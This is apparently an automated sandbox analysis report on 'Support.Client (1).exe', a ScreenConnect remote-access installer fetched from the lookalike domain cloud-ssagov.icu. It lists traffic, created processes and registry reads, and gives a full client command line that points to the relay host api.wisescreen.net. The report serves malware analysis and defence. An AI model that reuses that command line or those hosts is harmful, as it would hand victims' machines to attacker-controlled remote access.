Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.config
Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.confige
Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsBackstageShell.exe.configo
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClie
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.e
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA9F7000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsClient.exe.config
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileMana
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe
Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe(
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.P
Source: dfsvc.exe, 00000001.00000002.2526431199.000002CADA95C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.config
Source: dfsvc.exe, 00000001.00000002.2549254010.000002CAF4E6F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe.configQ
Source: dfsvc.exe, 00000001.00000002.2548221803.000002CAF4D87000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cloud-ssagov.icu/Bin/ScreenConnect.WindowsFileManager.exe/
Source: ScreenConnect.Core.dll0.1.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd
Source: qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: edb.log.5.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: qmgr.db.5.dr, edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.5.dr	String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.49.126.73:443 -> 192.168.2.4:49764 version: TLS 1.2

E-Banking Fraud

Drops certificate files (DER)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141	Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

System Summary

Detected potential unwanted application

Source: Support.Client (1).exe

PE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US

Creates files inside the system directory

Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\user.config
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

Detected potential crypto function

Source: C:\Users\user\Desktop\Support.Client (1).exe	Code function: 0_2_0061A495	0_2_0061A495
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B89AF4F	1_2_00007FFD9B89AF4F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A9D5A	1_2_00007FFD9B8A9D5A
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A31BD	1_2_00007FFD9B8A31BD
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8AD440	1_2_00007FFD9B8AD440
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8AB2D1	1_2_00007FFD9B8AB2D1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B891211	1_2_00007FFD9B891211
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B8A3229	1_2_00007FFD9B8A3229
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Code function: 1_2_00007FFD9B896138	1_2_00007FFD9B896138
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_04FD82D0	11_2_04FD82D0
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_04FD5F08	11_2_04FD5F08
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_04FDDA08	11_2_04FDDA08
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_04FD82D0	11_2_04FD82D0
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Code function: 11_2_04FDDA08	11_2_04FDDA08
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8A70DD	12_2_00007FFD9B8A70DD
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8A10D7	12_2_00007FFD9B8A10D7
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9B8A10CF	12_2_00007FFD9B8A10CF
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB5A21	12_2_00007FFD9BBB5A21
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 12_2_00007FFD9BBB6C7C	12_2_00007FFD9BBB6C7C
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9B8AA710	13_2_00007FFD9B8AA710
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9B8710CF	13_2_00007FFD9B8710CF
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9B8710D7	13_2_00007FFD9B8710D7
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BB830C0	13_2_00007FFD9BB830C0
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BB80790	13_2_00007FFD9BB80790
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BB865F6	13_2_00007FFD9BB865F6
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BB87217	13_2_00007FFD9BB87217
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Code function: 13_2_00007FFD9BB86825	13_2_00007FFD9BB86825

One or more processes crash

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872

Uses 32bit PE files

Source: Support.Client (1).exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, PopoutPanelTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, ProgramTaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'
Source: ScreenConnect.WindowsBackstageShell.exe0.1.dr, TaskbarButton.cs	Task registration methods: 'CreateDefaultDropDown'

Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: ScreenConnect.Windows.dll.1.dr, WindowsExtensions.cs	Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: ScreenConnect.ClientService.dll.1.dr, WindowsLocalUserExtensions.cs	Security API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)

Source: classification engine

Classification label: mal54.evad.winEXE@19/75@2/2

Source: C:\Users\user\Desktop\Support.Client (1).exe

0_2_00611000

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Deployment

Jump to behavior

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6872
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

File created: C:\Users\user\AppData\Local\Temp\Deployment

Jump to behavior

Source: C:\Users\user\Desktop\Support.Client (1).exe

Command line argument: dfshim

0_2_00611000

Source: Support.Client (1).exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor

Source: C:\Users\user\Desktop\Support.Client (1).exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Support.Client (1).exe "C:\Users\user\Desktop\Support.Client (1).exe"
Source: C:\Users\user\Desktop\Support.Client (1).exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872
Source: C:\Users\user\Desktop\Support.Client (1).exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe"
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
Source: unknown	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=api.wisescreen.net&p=8041&s=9298e168-a0cf-488d-954c-5c180dd52fec&k=BgIAAACkAABSU0ExAAgAAAEAAQDtQ8jiTjVfazPJSqJ2XEoaqaKFOzZ605yz6hYIv8M7oOnlwfDWfe3v2tUdEO1xGqJdiUZvf4Job0h77N%2f3xyDpec8%2bIXvZFdeEQv6ZmkteD4w4V7CairB78fNaNnQHdATNnOcWXVaX3zjxYIj2eh8cKVFr9wwIps1VKpOM9JTq4tPgXX%2fag0amDzTC1v7aH7ztAJoBRneVdo1mSJod7oL713MYSJAC5clrYHPeJUoCgAhv9UuNovpvt51NjB5FuZvgWP32mCuwprJpolaxfRuswOm879CoUpHd68BExmxShqAn9sLdLjj53kqwsixMTr1whX2%2b2GHRj3Qgw9exO8O8&r=&i=Untitled%20Session" "1"
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "e04200b7-51c0-4bc4-8341-7c372a508bae" "User"
Source: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.ClientService.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe" "RunRole" "f3bbb14b-5a68-497e-a4df-886e478b3d62" "System"
Source: C:\Users\user\Desktop\Support.Client (1).exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Process created: C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\22K7YDEL.EJG\CAEPJ7Q4.XND\scre..tion_25b0fbb6ef7eb094_0018.0003_394c92efd29e09fe\ScreenConnect.WindowsClient.exe"	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 6872 -ip 6872	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6872 -s 748	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown	Jump to behavior
